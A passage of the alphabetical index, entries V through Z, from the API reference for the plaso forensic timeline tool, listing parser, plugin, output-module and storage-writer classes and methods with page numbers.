VerifyStructure()(plaso.parsers.apt_history.APTHistoryLogParsermethod), 332

VerifyStructure()(plaso.parsers.bash_history.BashHistoryParsermethod), 334

VerifyStructure()(plaso.parsers.dpkg.DpkgParser method),345

VerifyStructure()(plaso.parsers.gdrive_synclog.GoogleDriveSyncLogParsermethod), 352

VerifyStructure()(plaso.parsers.google_logging.GoogleLogParsermethod), 353

VerifyStructure() (plaso.parsers.iis.WinIISParsermethod), 354

VerifyStructure()(plaso.parsers.mac_appfirewall.MacAppFirewallParsermethod), 359

VerifyStructure()(plaso.parsers.mac_securityd.MacOSSecuritydLogParsermethod), 363

VerifyStructure()(plaso.parsers.mac_wifi.MacWifiLogParsermethod), 364

VerifyStructure()(plaso.parsers.popcontest.PopularityContestParsermethod), 387

VerifyStructure()(plaso.parsers.santa.SantaParser method),395

VerifyStructure()(plaso.parsers.sccm.SCCMParser method),396

VerifyStructure()(plaso.parsers.selinux.SELinuxParser method),398

VerifyStructure()(plaso.parsers.setupapi.SetupapiLogParsermethod), 399

VerifyStructure()(plaso.parsers.skydrivelog.SkyDriveLogParsermethod), 400

VerifyStructure()

(plaso.parsers.skydrivelog.SkyDriveOldLogParsermethod), 401

VerifyStructure()(plaso.parsers.sophos_av.SophosAVLogParsermethod), 401

VerifyStructure()(plaso.parsers.syslog.SyslogParser method),412

VerifyStructure()(plaso.parsers.text_parser.PyparsingMultiLineTextParsermethod), 416

VerifyStructure()(plaso.parsers.text_parser.PyparsingSingleLineTextParsermethod), 417

VerifyStructure()(plaso.parsers.vsftpd.VsftpdLogParsermethod), 422

VerifyStructure()(plaso.parsers.winfirewall.WinFirewallParsermethod), 427

VerifyStructure()(plaso.parsers.xchatlog.XChatLogParsermethod), 434

VerifyStructure()(plaso.parsers.xchatscrollback.XChatScrollbackParsermethod), 436

VerifyStructure()(plaso.parsers.zsh_extended_history.ZshExtendedHistoryParsermethod), 436

version (plaso.containers.artifacts.OperatingSystemArtifactattribute), 99

version (plaso.parsers.amcache.AMCacheProgramEventDataattribute), 328

version (plaso.parsers.firefox_cache.FirefoxCacheEventDataattribute), 350

version (plaso.parsers.symantec.SymantecEventDataattribute), 410

version (plaso.parsers.winreg_plugins.windows_version.WindowsRegistryInstallationEventDataattribute), 324

version_path (plaso.parsers.sqlite_plugins.mac_document_versions.MacDocumentVersionsEventDataattribute), 273

version_tuple() (plaso.containers.artifacts.OperatingSystemArtifactproperty), 99

VFSBackEndArgumentsHelper (class inplaso.cli.helpers.vfs_backend), 80

video_conference (plaso.parsers.sqlite_plugins.skype.SkypeCallEventDataattribute), 281

ViewsFactory (class in plaso.cli.views), 97ViperAnalysisArgumentsHelper (class in

plaso.cli.helpers.viper_analysis), 80ViperAnalysisPlugin (class in

plaso.analysis.viper), 51ViperAnalyzer (class in plaso.analysis.viper), 51virus (plaso.parsers.symantec.SymantecEventData at-

604 Index


tribute), 410virus_id (plaso.parsers.symantec.SymantecEventData

attribute), 410VirusTotalAnalysisArgumentsHelper (class

in plaso.cli.helpers.virustotal_analysis), 81VirusTotalAnalysisPlugin (class in

plaso.analysis.virustotal), 52VirusTotalAnalyzer (class in

plaso.analysis.virustotal), 53virustype (plaso.parsers.symantec.SymantecEventData

attribute), 410visit_count (plaso.parsers.plist_plugins.safari.SafariHistoryEventData

attribute), 247visit_count (plaso.parsers.sqlite_plugins.firefox_history.FirefoxPlacesBookmarkEventData

attribute), 265visit_count (plaso.parsers.sqlite_plugins.firefox_history.FirefoxPlacesPageVisitedEventData

attribute), 265visit_count (plaso.parsers.sqlite_plugins.safari.SafariHistoryPageVisitedEventData

attribute), 280visit_source (plaso.parsers.sqlite_plugins.chrome_history.ChromeHistoryPageVisitedEventData

attribute), 260visit_type (plaso.parsers.sqlite_plugins.firefox_history.FirefoxPlacesPageVisitedEventData

attribute), 265visitor_id (plaso.parsers.cookie_plugins.ganalytics.GoogleAnalyticsEventData

attribute), 218volume (plaso.parsers.santa.SantaMountEventData at-

tribute), 394volume_device_paths

(plaso.parsers.winprefetch.WinPrefetchExecutionEventDataattribute), 431

volume_label (plaso.parsers.winlnk.WinLnkLinkEventDataattribute), 430

volume_serial_numbers(plaso.parsers.winprefetch.WinPrefetchExecutionEventDataattribute), 431

VsftpdEventData (class in plaso.parsers.vsftpd),422

VsftpdLogParser (class in plaso.parsers.vsftpd),422

Wwait_after_analysis

(plaso.analysis.hash_tagging.HashAnalyzerattribute), 42

wait_after_analysis(plaso.analysis.nsrlsvr.NsrlsvrAnalyzer at-tribute), 48

was_http_non_get (plaso.parsers.plist_plugins.safari.SafariHistoryEventDataattribute), 247

was_http_non_get (plaso.parsers.sqlite_plugins.safari.SafariHistoryPageVisitedEventDataattribute), 280

web_url (plaso.parsers.sqlite_plugins.twitter_android.TwitterAndroidContactEventDataattribute), 287

WebViewCookieEventData (class in

plaso.parsers.sqlite_plugins.android_webview),252

WebViewPlugin (class inplaso.parsers.sqlite_plugins.android_webview),253

where (plaso.parsers.mac_keychain.KeychainInternetRecordEventDataattribute), 361

WindowsAllUsersAppDataKnowledgeBasePlugin(class in plaso.preprocessors.windows), 442

WindowsAllUsersAppProfileKnowledgeBasePlugin(class in plaso.preprocessors.windows), 442

WindowsAllUsersProfileEnvironmentVariablePlugin(class in plaso.preprocessors.windows), 442

WindowsAvailableTimeZonesPlugin (class inplaso.preprocessors.windows), 442

WindowsBootExecuteEventData (class inplaso.parsers.winreg_plugins.lfu), 304

WindowsBootVerificationEventData (class inplaso.parsers.winreg_plugins.lfu), 304

WindowsCodepagePlugin (class inplaso.preprocessors.windows), 442

WindowsDistributedLinkTrackingEventData(class in plaso.containers.windows_events),119

WindowsEnvironmentVariableArtifactPreprocessorPlugin(class in plaso.preprocessors.windows), 442

WindowsHostnamePlugin (class inplaso.preprocessors.windows), 443

WindowsPathEnvironmentVariableArtifactPreprocessorPlugin(class in plaso.preprocessors.windows), 443

WindowsProgramDataEnvironmentVariablePlugin(class in plaso.preprocessors.windows), 443

WindowsProgramDataKnowledgeBasePlugin(class in plaso.preprocessors.windows), 443

WindowsProgramFilesEnvironmentVariablePlugin(class in plaso.preprocessors.windows), 443

WindowsProgramFilesX86EnvironmentVariablePlugin(class in plaso.preprocessors.windows), 443

WindowsRegistryEventData (class inplaso.containers.windows_events), 119

WindowsRegistryInstallationEventData(class in plaso.parsers.winreg_plugins.windows_version),324

WindowsRegistryKeyArtifactPreprocessorPlugin(class in plaso.preprocessors.interface), 438

WindowsRegistryKeyPathFilter (class inplaso.parsers.winreg_plugins.interface), 301

WindowsRegistryKeyPathPrefixFilter (classin plaso.parsers.winreg_plugins.interface), 302

WindowsRegistryKeyPathSuffixFilter (classin plaso.parsers.winreg_plugins.interface), 302

WindowsRegistryKeyWithValuesFilter (classin plaso.parsers.winreg_plugins.interface), 302

WindowsRegistryNetworkListEventData

Index 605


(class in plaso.parsers.winreg_plugins.networks),310

WindowsRegistryPlugin (class inplaso.parsers.winreg_plugins.interface),302

WindowsRegistryServiceEventData (class inplaso.parsers.winreg_plugins.services), 315

WindowsRegistryValueArtifactPreprocessorPlugin(class in plaso.preprocessors.interface), 438

WindowsServiceCollection (class inplaso.analysis.windows_services), 53

WindowsServicesAnalysisArgumentsHelper(class in plaso.cli.helpers.windows_services_analysis),81

WindowsServicesAnalysisPlugin (class inplaso.analysis.windows_services), 53

WindowsSystemProductPlugin (class inplaso.preprocessors.windows), 443

WindowsSystemRootEnvironmentVariablePlugin(class in plaso.preprocessors.windows), 443

WindowsSystemVersionPlugin (class inplaso.preprocessors.windows), 443

WindowsTimelineGenericEventData (class inplaso.parsers.sqlite_plugins.windows_timeline),291

WindowsTimelinePlugin (class inplaso.parsers.sqlite_plugins.windows_timeline),291

WindowsTimelineUserEngagedEventData(class in plaso.parsers.sqlite_plugins.windows_timeline),292

WindowsTimeZonePlugin (class inplaso.preprocessors.windows), 444

WindowsTimezoneSettingsEventData (class inplaso.parsers.winreg_plugins.timezone), 319

WindowsUSBDeviceEventData (class inplaso.parsers.winreg_plugins.usb), 321

WindowsUserAccountsPlugin (class inplaso.preprocessors.windows), 444

WindowsVersionPlugin (class inplaso.parsers.winreg_plugins.windows_version),324

WindowsVolumeEventData (class inplaso.containers.windows_events), 119

WindowsWinDirEnvironmentVariablePlugin(class in plaso.preprocessors.windows), 444

WinEVTFormatter (class in plaso.formatters.winevt),178

WinEvtParser (class in plaso.parsers.winevt), 423WinEvtRecordEventData (class in

plaso.parsers.winevt), 423WinevtResourcesSqlite3DatabaseReader

(class in plaso.formatters.winevt_rc), 180WinEVTXFormatter (class in

plaso.formatters.winevtx), 181WinEvtxParser (class in plaso.parsers.winevtx), 424WinEvtxRecordEventData (class in

plaso.parsers.winevtx), 424WinFirewallEventData (class in

plaso.parsers.winfirewall), 426WinFirewallParser (class in

plaso.parsers.winfirewall), 427WinIISParser (class in plaso.parsers.iis), 354WinJobEventData (class in plaso.parsers.winjob),

428WinJobParser (class in plaso.parsers.winjob), 428WinLnkLinkEventData (class in

plaso.parsers.winlnk), 429WinLnkLinkFormatter (class in

plaso.formatters.winlnk), 181WinLnkParser (class in plaso.parsers.winlnk), 430WinlogonEventData (class in

plaso.parsers.winreg_plugins.winlogon),325

WinlogonPlugin (class inplaso.parsers.winreg_plugins.winlogon),325

WinPrefetchExecutionEventData (class inplaso.parsers.winprefetch), 431

WinPrefetchExecutionFormatter (class inplaso.formatters.winprefetch), 182

WinPrefetchParser (class inplaso.parsers.winprefetch), 431

WinRARHistoryEventData (class inplaso.parsers.winreg_plugins.winrar), 326

WinRARHistoryPlugin (class inplaso.parsers.winreg_plugins.winrar), 326

WinRecycleBinEventData (class inplaso.parsers.recycler), 390

WinRecycleBinParser (class inplaso.parsers.recycler), 390

WinRecyclerInfo2Parser (class inplaso.parsers.recycler), 390

WinRegistryGenericFormatter (class inplaso.formatters.winreg), 182

WinRegistryParser (class in plaso.parsers.winreg),432

WinRegTimezonePlugin (class inplaso.parsers.winreg_plugins.timezone),319

WORD (plaso.parsers.iis.WinIISParser attribute), 355WorkerProcess (class in

plaso.multi_processing.worker_process),199

workers_status() (plaso.engine.processing_status.ProcessingStatusproperty), 141

WorkersArgumentsHelper (class inplaso.cli.helpers.workers), 82

606 Index


working_directory(plaso.parsers.winjob.WinJobEventDataattribute), 428

working_directory(plaso.parsers.winlnk.WinLnkLinkEventDataattribute), 430

Write() (plaso.cli.tools.CLIOutputWriter method), 93Write() (plaso.cli.tools.FileObjectOutputWriter

method), 95Write() (plaso.cli.tools.StdoutOutputWriter method),

95Write() (plaso.cli.views.BaseTableView method), 96Write() (plaso.cli.views.CLITableView method), 96Write() (plaso.cli.views.CLITabularTableView

method), 96Write() (plaso.cli.views.MarkdownTableView

method), 97WriteEvent() (plaso.output.interface.OutputModule

method), 201WriteEventBody() (plaso.output.interface.LinearOutputModule

method), 201WriteEventBody() (plaso.output.interface.OutputModule

method), 201WriteEventBody() (plaso.output.json_line.JSONLineOutputModule

method), 202WriteEventBody() (plaso.output.json_out.JSONOutputModule

method), 203WriteEventBody() (plaso.output.kml.KMLOutputModule

method), 203WriteEventBody() (plaso.output.null.NullOutputModule

method), 209WriteEventBody() (plaso.output.shared_elastic.SharedElasticsearchOutputModule

method), 212WriteEventBody() (plaso.output.xlsx.XLSXOutputModule

method), 214WriteEventMACBGroup()

(plaso.output.interface.OutputModule method),202

WriteEventMACBGroup()(plaso.output.l2t_csv.L2TCSVOutputModulemethod), 204

WriteFooter() (plaso.output.interface.OutputModulemethod), 202

WriteFooter() (plaso.output.json_out.JSONOutputModulemethod), 203

WriteFooter() (plaso.output.kml.KMLOutputModulemethod), 204

WriteHeader() (plaso.output.elastic.ElasticsearchOutputModulemethod), 200

WriteHeader() (plaso.output.interface.OutputModulemethod), 202

WriteHeader() (plaso.output.json_out.JSONOutputModulemethod), 203

WriteHeader() (plaso.output.kml.KMLOutputModule

method), 204WriteHeader() (plaso.output.l2t_csv.L2TCSVOutputModule

method), 205WriteHeader() (plaso.output.shared_dsv.DSVOutputModule

method), 210WriteHeader() (plaso.output.timesketch_out.TimesketchOutputModule

method), 213WriteHeader() (plaso.output.xlsx.XLSXOutputModule

method), 215WritePreprocessingInformation()

(plaso.storage.redis.writer.RedisStorageWritermethod), 460

WriteSerialized()(plaso.serializer.interface.AttributeContainerSerializermethod), 444

WriteSerialized()(plaso.serializer.json_serializer.JSONAttributeContainerSerializerclass method), 445

WriteSerializedDict()(plaso.serializer.json_serializer.JSONAttributeContainerSerializerclass method), 445

WriteSessionCompletion()(plaso.storage.fake.writer.FakeStorageWritermethod), 451

WriteSessionCompletion()(plaso.storage.file_interface.StorageFileWritermethod), 477

WriteSessionCompletion()(plaso.storage.interface.BaseStore method),483

WriteSessionCompletion()(plaso.storage.interface.StorageWritermethod), 489

WriteSessionCompletion()(plaso.storage.redis.writer.RedisStorageWritermethod), 461

WriteSessionConfiguration()(plaso.storage.fake.writer.FakeStorageWritermethod), 451

WriteSessionConfiguration()(plaso.storage.file_interface.StorageFileWritermethod), 477

WriteSessionConfiguration()(plaso.storage.interface.BaseStore method),483

WriteSessionConfiguration()(plaso.storage.interface.StorageWritermethod), 489

WriteSessionConfiguration()(plaso.storage.redis.writer.RedisStorageWritermethod), 461

WriteSessionStart()(plaso.storage.fake.writer.FakeStorageWritermethod), 451

Index 607


WriteSessionStart()(plaso.storage.file_interface.StorageFileWritermethod), 477

WriteSessionStart()(plaso.storage.interface.BaseStore method),483

WriteSessionStart()(plaso.storage.interface.StorageWritermethod), 490

WriteSessionStart()(plaso.storage.redis.writer.RedisStorageWritermethod), 461

WriteTaskCompletion()(plaso.storage.fake.writer.FakeStorageWritermethod), 451

WriteTaskCompletion()(plaso.storage.file_interface.StorageFileWritermethod), 477

WriteTaskCompletion()(plaso.storage.interface.BaseStore method),483

WriteTaskCompletion()(plaso.storage.interface.StorageWritermethod), 490

WriteTaskCompletion()(plaso.storage.redis.writer.RedisStorageWritermethod), 461

WriteTaskStart() (plaso.storage.fake.writer.FakeStorageWritermethod), 451

WriteTaskStart() (plaso.storage.file_interface.StorageFileWritermethod), 478

WriteTaskStart() (plaso.storage.interface.BaseStoremethod), 484

WriteTaskStart() (plaso.storage.interface.StorageWritermethod), 490

WriteTaskStart() (plaso.storage.redis.writer.RedisStorageWritermethod), 461

WrongBencodePlugin, 186WrongCompoundZIPPlugin, 186WrongFormatter, 186WrongPlugin, 186WrongQueueType, 186

XXChatLogEventData (class in

plaso.parsers.xchatlog), 434XChatLogParser (class in plaso.parsers.xchatlog),

434XChatScrollbackEventData (class in

plaso.parsers.xchatscrollback), 435XChatScrollbackParser (class in

plaso.parsers.xchatscrollback), 435XLSXOutputArgumentsHelper (class in

plaso.cli.helpers.xlsx_output), 83

XLSXOutputModule (class in plaso.output.xlsx), 214xml_string (plaso.parsers.winevtx.WinEvtxRecordEventData

attribute), 425XMLProcessStatusRPCClient (class in

plaso.multi_processing.plaso_xmlrpc), 192XMLProcessStatusRPCServer (class in

plaso.multi_processing.plaso_xmlrpc), 192XMLRPCClient (class in

plaso.multi_processing.plaso_xmlrpc), 192

YYAMLFilterFile (class in

plaso.engine.yaml_filter_file), 146YAMLFormattersFile (class in

plaso.formatters.yaml_formatters_file), 183yara_match (plaso.containers.events.EventDataStream

attribute), 104yara_rules_string

(plaso.engine.configurations.ExtractionConfigurationattribute), 122

YaraAnalyzer (class inplaso.analyzers.yara_analyzer), 61

YaraRulesArgumentsHelper (class inplaso.cli.helpers.yara_rules), 83

year() (plaso.engine.knowledge_base.KnowledgeBaseproperty), 132

year() (plaso.parsers.mediator.ParserMediator prop-erty), 374

ZZeitgeistActivityDatabasePlugin (class in

plaso.parsers.sqlite_plugins.zeitgeist), 292ZeitgeistActivityEventData (class in

plaso.parsers.sqlite_plugins.zeitgeist), 293ZeroMQBufferedQueue (class in

plaso.engine.zeromq_queue), 146ZeroMQBufferedReplyBindQueue (class in

plaso.engine.zeromq_queue), 147ZeroMQBufferedReplyQueue (class in

plaso.engine.zeromq_queue), 147ZeroMQPullConnectQueue (class in

plaso.engine.zeromq_queue), 148ZeroMQPullQueue (class in

plaso.engine.zeromq_queue), 148ZeroMQPushBindQueue (class in

plaso.engine.zeromq_queue), 149ZeroMQPushQueue (class in

plaso.engine.zeromq_queue), 149ZeroMQQueue (class in plaso.engine.zeromq_queue),

150ZeroMQRequestConnectQueue (class in

plaso.engine.zeromq_queue), 151ZeroMQRequestQueue (class in

plaso.engine.zeromq_queue), 151

608 Index


ZshExtendedHistoryParser (class inplaso.parsers.zsh_extended_history), 436

ZshHistoryEventData (class inplaso.parsers.zsh_extended_history), 437

Index 609